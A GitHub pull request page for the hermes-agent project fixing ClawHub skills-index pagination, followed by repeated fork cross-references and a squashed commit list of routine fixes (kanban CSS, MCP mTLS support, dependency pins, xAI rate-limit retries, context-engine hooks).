fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+)#33748
Conversation
The website was showing 200 ClawHub skills out of 20k+ because
`ClawHubSource.search("")` for empty queries went straight to a single
unpaginated request. ClawHub's API caps any single page at 200 items and
returns a `nextCursor`; we grabbed page 1 and stopped, so the cached
index served from hermes-agent.nousresearch.com had a silent 99%
truncation.
End users never hit clawhub.ai directly (the index is rebuilt twice
daily by .github/workflows/skills-index.yml and served as a static JSON
on the docs site), so the cap-and-cache architecture is correct — it
just wasn't being filled.
Changes:
- `ClawHubSource.search(query="")` now routes through the existing
`_load_catalog_index()` paginating walker instead of the unpaginated
listing fallback (non-empty queries still hit the fast catalog search).
- `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live
catalog is ~20k as of May 2026, with headroom for growth).
- `build_skills_index.py`: per-source crawl limits split out — ClawHub
and LobeHub get 100k, others keep their effective caps.
- `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination
regression hard-fails the CI build instead of silently shipping a
degenerate index.
Test plan:
- New unit test `test_search_empty_query_paginates_full_catalog`
exercises the cursor-following path with three mocked pages (450
total items) and asserts all pages are walked.
- Existing 9 ClawHub tests + 127 broader skills_hub tests all pass.
- E2E against live ClawHub API: walker reached 9700+ skills across 49
pages before this commit landed, paginating well past the previous
50-page cap.
🔎 Lint report:
|
E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
E2E walk against live ClawHub API: 49,698 skillsClawHub's catalog is much larger than the 20k estimate I gave in the original PR body — the E2E walker hit my initial 250-page safety cap with Pushed a follow-up commit bumping the ceilings to match:
Walks terminate on |
…to JS (#33809) PR #33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…4081) Today's three skills-index PRs (#33748, #33809, #34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000 #AI commit#
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before. #AI commit#
…usResearch#34081) Today's three skills-index PRs (NousResearch#33748, NousResearch#33809, NousResearch#34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged. #AI commit#
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…usResearch#34081) Today's three skills-index PRs (NousResearch#33748, NousResearch#33809, NousResearch#34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.
…0k+) (NousResearch#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000
…to JS (NousResearch#33809) PR NousResearch#33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.
…usResearch#34081) Today's three skills-index PRs (NousResearch#33748, NousResearch#33809, NousResearch#34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.
…es (#9) * fix(kanban): harden sqlite connection concurrency * fix(kanban): add Windows init lock guard * chore(release): map MoonRay305 contributor email for #32759 salvage Adds `squiddy@2rook.ai → MoonRay305` to AUTHOR_MAP so contributor_audit.py passes for the salvaged commits in #33482-followup PR. * fix(website): pin serialize-javascript and uuid via npm overrides Resolves the two Dependabot alerts currently open against the website lockfile: - serialize-javascript: pin to ^7.0.5 (was 6.0.2 — high-severity RCE via RegExp.flags + Date.prototype.to*, plus medium-severity DoS) - uuid: pin to ^14.0.0 (was 8.3.2 — medium buffer bounds check miss in v3/v5/v6 when buf is provided) Lockfile regenerated against current main (not the stale lockfile from the original PR — several Dependabot bumps for mermaid, webpack-dev-server, @babel/plugin-transform-modules-systemjs, fast-uri, lodash-es+langium, lodash, follow-redirects, and dompurify have landed since #30036 was opened, so the website portion was re-applied surgically on top of those). Salvaged the website half of PR #30036. The TUI test half landed on main separately, so this PR is web-only. * feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly. * fix(auth): refresh Nous entitlement in tool menus * test(auth): update entitlement CI expectations * fix(agent): preload jiter native parser * Fix xAI OAuth timeout manual fallback * fix(security): require API_SERVER_KEY before dispatching API server work * fix: expose context engine tools with saved toolsets * feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721) Adds first-class `client_cert` / `client_key` config keys so MCP servers behind mTLS work without an external TLS-terminating proxy. Resolves inbound community question (Jeremy W.). Schema (per `mcp_servers.<name>`, HTTP/SSE only): - `client_cert: "/path/to/combined.pem"` — single PEM with cert + key - `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate - `client_cert: [cert, key]` or `[cert, key, password]` — list form, with optional passphrase for encrypted keys Paths support `~` expansion. Missing files raise a server-scoped `FileNotFoundError` at connect time rather than failing later with an opaque TLS handshake error. Wiring: - New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned `httpx.AsyncClient` alongside the existing `verify=` handling. - SSE path: routed through an `httpx_client_factory` that wraps the SDK's defaults (follow_redirects=True) and layers `verify` + `cert` on top. The factory is only injected when needed, so the SDK's built-in `create_mcp_http_client` keeps being used in the default case. - Deprecated mcp<1.24 path left untouched — that SDK's `streamablehttp_client` signature doesn't expose `cert`, and adding it would be dead code. Also documents the previously-undocumented `ssl_verify` key (bool or CA bundle path) in the MCP config reference. Tests: - `tests/tools/test_mcp_client_cert.py` (new, 19 tests): - `_resolve_client_cert` helper: all three input forms, `~` expansion, missing-file and validation errors. - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for string and tuple forms; absent when unset; missing-file error propagates. - SSE transport: factory only injected when cert or non-default verify is set; factory applies cert, custom CA bundle, and preserves `follow_redirects=True` + forwarded headers/auth. - Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py` still pass. * docs: drop stale Kimi/DeepSeek vision example (#33736) Kimi K2.6 is natively multimodal — flagged by Shengyuan from the Kimi growth team. Replace the named-vendor example with a model-agnostic phrasing so the row doesn't go stale as more vendors ship vision. * fix(security): require source CIDR allowlisting for public msgraph webhook binds * fix(auth): sync manual:device_code Codex pool entries on re-auth (#33744) #33164 made _save_codex_tokens sync the singleton-seeded `device_code` pool entry on Codex OAuth re-auth. That fixed the #33000 path but missed `manual:device_code` entries created by `hermes auth add openai-codex` (the recommended workaround for users who hit #33000 before #33164 landed). Every subsequent re-auth would refresh the device_code entry but leave the manual:device_code entry holding the consumed refresh token plus stale last_error_* markers — immediately recreating the 401 token_invalidated symptom on the next request, exactly as reported in #33538. Extend the refreshable source set to include `manual:device_code`. Completing the device-code OAuth flow proves the user owns the ChatGPT account, so it is safe to refresh every device-code-backed entry. Keep `manual:api_key` and other non-device-code manual sources untouched — those represent independent credentials. Closes #33538. * fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000 * feat(context-engine): host contract for external context engines Condenses the substance of PRs #16453, #17453, #16451, #17600, and #13373 into a minimal generic host contract that external context engine plugins (e.g. hermes-lcm) need to integrate cleanly. Drops scaffolding that duplicated existing infrastructure or had marginal value. Five concrete changes: 1. `_transition_context_engine_session()` on AIAgent — generic lifecycle helper that fires on_session_end → on_session_reset → on_session_start → optional carry_over_new_session_context. Engines implement only the hooks they need; missing hooks are skipped. Built-in compressor keeps its existing reset-only behavior because callers default to no metadata. `reset_session_state()` now optionally accepts previous_messages / old_session_id / carry_over_context and delegates to the transition helper when provided. (#16453) 2. `conversation_id` passed to `on_session_start()` — both the agent-init call site and the compression-boundary call site now forward `self._gateway_session_key` so plugin engines have a stable conversation identity that survives session_id rotation (compression splits, /new, resume). The key already existed on AIAgent; it just wasn't reaching engines. (#16453) 3. Canonical cache buckets forwarded to engines — the usage dict passed to `update_from_response()` now includes input_tokens, output_tokens, cache_read_tokens, cache_write_tokens, and reasoning_tokens on top of the legacy prompt/completion/total keys. Engines can make decisions on cache-hit ratios and reasoning costs instead of only aggregates. ABC docstring updated. (#17453) 4. Plugin-registered context engines visible in the picker — `_discover_context_engines()` in plugins_cmd.py now also includes engines registered via `ctx.register_context_engine()` from plugin manifests, deduplicating by name so repo-shipped descriptions win on collision. (#16451) 5. `_EngineCollector.register_command()` — context engines using the standard `register(ctx)` pattern can now expose slash commands (e.g. `/lcm`). Routes to the global plugin command registry with the same conflict-rejection policy regular plugins use (no shadowing built-ins, no clobbering other plugins). Previously these calls hit a no-op and the slash commands silently never appeared. (#17600) Dropped from the original 5 PRs: - Compression boundary signal (`boundary_reason="compression"`) from #16453 — already on main at `agent/conversation_compression.py:412-424`, landed via the bg-review extraction. - `discover_plugins()` before fallback in run_agent.py from #16451 — redundant: `get_plugin_context_engine()` already routes through `_ensure_plugins_discovered()` which is idempotent. - Runtime identity diagnostics method + helpers from #13373 (+251 LOC) — operators can already read engine state via `engine.get_status()`; the diagnostics view added marginal value relative to its surface area. - The 553-LOC slash-command machinery from #17600 — replaced with a 20-LOC `register_command` method on the collector that reuses the existing plugin command registry instead of building a parallel one. Net: ~215 LOC of host-contract changes + 282 LOC of focused tests, vs ~1,176 LOC across the original 5 PRs. Co-authored-by: Tosko4 <1294707+Tosko4@users.noreply.github.com> Closes #16453. Closes #17453. Closes #16451. Closes #17600. Closes #13373. Related: stephenschoettler/hermes-lcm#68. * fix(nix): drop stale "vercel" group from #full variant The `vercel` optional-dependency was removed from pyproject.toml in #33067, but `nix/packages.nix` (added a few hours later in #33108) still references `"vercel"` in the `#full` variant's `extraDependencyGroups`. uv2nix fails evaluation with: error: Extra/group name 'vercel' does not match either extra or dependency group Because `nix/devShell.nix` does `inputsFrom = builtins.attrValues self'.packages`, the broken `#full` derivation is pulled into the dev shell too, so `nix develop` / direnv breaks on a fresh clone — not just `nix build .#full`. * fix(kanban): wrap columns into rows and fix vertical overflow Two CSS issues in the kanban dashboard: 1. Columns overflow horizontally with no way to reach them — the original scrollbar-width: none hid the scrollbar entirely, and even with a scrollbar, a wrapping layout is better UX for a board with 8+ columns. Changed to flex-wrap: wrap and removed the overflow-x: auto + hidden scrollbar rules. Columns now flow into multiple rows (~3 per row on a typical viewport) instead of running off-screen. 2. .hermes-kanban-column-body lacked flex: 1 and min-height: 0, so the flex child's implicit min-height: auto prevented it from shrinking below its content size. Columns with many cards pushed past the parent max-height instead of scrolling internally. Verified: 9 columns wrap into 3 rows, all visible without horizontal scroll. Done column (53 tasks) scrolls vertically within its column bounds. * fix(kanban): show horizontal scrollbar instead of wrapping columns Salvage follow-up on top of @vynxevainglory-ai's PR #29233. Keep the column-body flex:1 + min-height:0 fix (tall columns scroll internally now), but drop the flex-wrap: wrap part — instead just stop hiding the existing horizontal scrollbar. PR #523254b34 (sadiksaifi, May 18) deliberately moved the kanban board from a wrapping grid to a single-row pinned-width flex so the board stays as one stable horizontal row. The mistake in that PR was the scrollbar-width: none + ::-webkit-scrollbar { display: none } pair, which hid the affordance so columns past the viewport became visually inaccessible. Fixing that hidden-scrollbar bug while keeping the single-row design honors both contributors' intent. * chore(release): AUTHOR_MAP entry for vynxevainglory-ai PR #29233 salvage. * fix(android): reject unsafe tar members in psutil compatibility installer * fix(xai-proxy): handle 429 rate-limit responses in proxy retry path get_retry_credential only triggered on 401; a 429 Too Many Requests from xAI was silently streamed back with no key rotation or back-off signal. - server.py: widen retry gate from == 401 to in {401, 429} - xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate to stamp the 1-hour cooldown on the rate-limited key and return the next available credential. Returns None if pool is exhausted. * test(xai-proxy): regression coverage for #28932 429 handling Three new tests in tests/hermes_cli/test_proxy.py: - xai_adapter_retry_rotates_pool_entry_on_429 — headline #28932 case. Two-entry pool, 429 on first entry, must rotate to second entry AND must NOT call refresh_xai_oauth_pure (refresh is irrelevant for rate limits). - xai_adapter_retry_returns_none_on_429_when_pool_exhausted — single-entry pool: 429 returns None so the rate-limit response flows back to the client unchanged (existing behavior preserved). - xai_adapter_retry_returns_none_for_unrelated_status — non-{401, 429} statuses must not trigger any retry path at all; guards against the gate becoming too broad in future changes. Each test asserts that refresh_xai_oauth_pure is never called on the 429 path — refresh is a 401-specific concern. 39/39 in tests/hermes_cli/test_proxy.py. * docs: 30-day overhaul — correctness audit, PR coverage, Nous Portal weave, sidebar reorg (#33782) * docs(audit): correctness pass across getting-started, reference, features, messaging, developer-guide, guides, integrations, user-guide * docs: add PR coverage for last 30d + Nous Portal weave + nav reorg + build fixes - Add docs for top user-visible PRs that shipped without docs (api-server session control, kanban features, telegram pin/edit, provider client tag, xAI retired-model migration, cron name lookup, --branch update flag, etc.) - Apply Nous Portal weave across 23 pages (tasteful one-liners on getting-started/learning-path, configuration, overview, vision, x-search, credential-pools, provider-routing, cron, codex-runtime, profiles, docker, messaging/index, multiple guides, plus FAQ + index promotion) - Reorganize sidebar: split Messaging into Popular/M365/Chinese/Other, Reference into Command/Configuration/Tools-Skills sub-categories, add orphan developer-guide pages (web-search-provider-plugin, browser-supervisor), move features from Integrations back to Features, fold lone spotify into Media & Web. - Regenerate skill stubs + catalogs (kanban-codex-lane, hermes-s6-container- supervision, web-pentest) - Fix broken anchor links (security/cron, configuration/fallback, telegram large-files, adding-platform-adapters step-by-step) * fix: limit pre-update state snapshots * chore(release): add AUTHOR_MAP entry for AdityaRajeshGadgil * fix(tirith): reject non-regular tar members during auto-install process * fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered In GatewayStreamConsumer._run(), _final_content_delivered was set to True based on the success of a mid-stream finalize edit, before the final finalize edit was attempted. When the final edit later failed (Telegram flood control, retry-after), _final_response_sent stayed False but _final_content_delivered was already True, so gateway/run.py suppressed its normal final send and the user saw a partial / fallback message instead of the real answer. Changes in gateway/stream_consumer.py: - Remove the premature _final_content_delivered = True at the top of the got_done block. - Set _final_content_delivered = True only when the actual final send / edit succeeds, in each finalize branch (no-finalize adapter, _message_id finalize, no-_already_sent send). - _send_fallback_final: don't set _final_response_sent = True when only some chunks were delivered; the gateway should still attempt a complete final send. Set _final_content_delivered = True alongside _final_response_sent on the success path and short-text path. - Cancellation handler: set _final_content_delivered = True alongside _final_response_sent when the best-effort final edit succeeds. Adds TestFinalContentDeliveredGuard with 3 regression tests covering the core bug scenario, the happy path, and partial fallback. Closes #33708 Closes #25010 Refs #29200 Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com> * fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers api_messages is built once before the retry loop while the primary provider is active. When a mid-conversation fallback switches to a require-side thinking provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary (e.g. Codex) go out without reasoning_content and the new provider rejects the request with HTTP 400 ("reasoning_content must be passed back"). Re-apply the echo-back pad against the current provider immediately before building the request kwargs. Idempotent and a no-op unless the active provider enforces echo-back, so it covers all fallback paths without affecting normal or reject-side operation. Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment. Co-Authored-By: Claude Opus 4.7 (1M context) 